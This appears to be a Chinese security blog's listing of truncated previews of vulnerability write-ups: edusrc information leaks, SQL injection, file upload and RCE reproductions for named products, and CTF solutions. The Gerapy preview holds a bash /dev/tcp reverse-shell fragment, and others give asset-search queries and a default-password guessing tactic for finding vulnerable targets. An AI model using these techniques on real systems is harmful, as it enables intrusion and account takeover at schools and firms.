记edusrc一处信息泄露登录统一平台
前言我们都知道像大学之类的各种平台的登录账号基本上是学号,初始登录密码基本上是学生身份证的后6位再拼接上一些带有学校缩写的英文字母。所以我们在找漏洞的时候可以换一种思路,先通过去找身份证信息或者是有固定初始密码的平台来尝试,这样子成功的概率就会比较大。测试思路1.谷歌语法搜索:inurl:"edu.cn" intext:"初始密码",如果看到初始密码是一串固
记一处任意文件下载
## 最近在整理多个CMS相关漏洞的时候,发现任意文件读取漏洞比较常见,所以也去碰碰运气看看能不能遇上一个。#CTL{\n}#CTL{\n}## 前置知识#CTL{\n}php中任意文件读取、下载、删除等漏洞都是有关键函数的,比如文件读取的函数有readfile()、fread()、file_get_contents();文件下载是利用header头实现的;文件删除的函数有unlink()、rmd
记edusrc一处信息泄露
## 一、信息收集#CTL{\n}在搜索某一学校的资产时,找到了一处学工系统。#CTL{\n}![](https://nc0.cdn.zkaq.cn/md/14127/d52c774844ab326d6b0328ef2c7f875c_96782.png)#CTL{\n}登录进去,发现有两种登陆方式,一种是统一身份认证,一种是DB认证。#CTL{\n}![](https://nc0.cdn.zkaq
浙大恩特CRM文件上传0day
## 简介#CTL{\n}浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。#CTL{\n}#CTL{\n}## 资产收集#CTL{\n}fofa:title="欢迎使用浙大恩特客户资源管理系统"#CTL{\n}hunter:web.title="欢迎使用浙大恩特
【漏洞复现】IP-guard远程命令执行漏洞
## 简介#CTL{\n}IP-guard作为专业的信息安全管理和数据防泄漏解决方案,为企业的关键数据资产提供强有力的保护。其在各行各业都备受欢迎,尤其在医药领域,其价值更是凸显。#CTL{\n}#CTL{\n}## 影响版本#CTL{\n}IP-guard WebServer version
【漏洞复现】Gerapy弱口令加远程命令执行
## gerapy#CTL{\n}Gerapy是一款基于Scrapy、Scrapyd、Django和Vue.js的分布式爬虫管理框架。#CTL{\n}#CTL{\n}## 影响版本#CTL{\n}Gerapy & /dev/tcp/ip地址/6000 0>&1'`即可反弹shell。#CTL{\n}#CTL{\n}## nucl
【漏洞复现】HFOffice医微云SQL注入漏洞
## 漏洞描述#CTL{\n}红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。平台list接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。#CTL{\n}#CTL{\n}## 资产收集#
记一处sql注入
## 资产收集#CTL{\n}google上搜索inurl:.aspx?user=1。搜索出来一大堆,一个一个尝试,看到有一个管理系统。#CTL{\n}![](https://nc0.cdn.zkaq.cn/md/14127/69539249ae47ded8732919086a97fa54_17948.png)#CTL{\n}在quake上搜索ip地址,可以看到该地址用到了启莱OA和致翔OA。#C
NewStarCTF第五周web和misc赛题
# 一、隐秘的图片#CTL{\n}给出了两张图片,像是二维码,但是其中一张图片是损坏的,因此想到使用Stegsolve对两张图片进行异或:#CTL{\n}![](https://nc0.cdn.zkaq.cn/md/14127/dc83b9e28e644e5d0e9b3d67e3940042_77328.png)#CTL{\n}![](https://nc0.cdn.zkaq.cn/md/1412
记一处src的XXL-JOB弱口令加远程命令执行
## XXL-job简介#CTL{\n}xxl-job是一个分布式的任务调度平台,其核心设计目标是:学习简单、开发迅速、轻量级、易扩展,现在已经开放源代码并接入多家公司的线上产品线,开箱即用。#CTL{\n}源码仓库地址:https://github.com/xuxueli/xxl-job#CTL{\n}官方文档https://www.xuxueli.com/xxl-job#CTL{\n}#CTL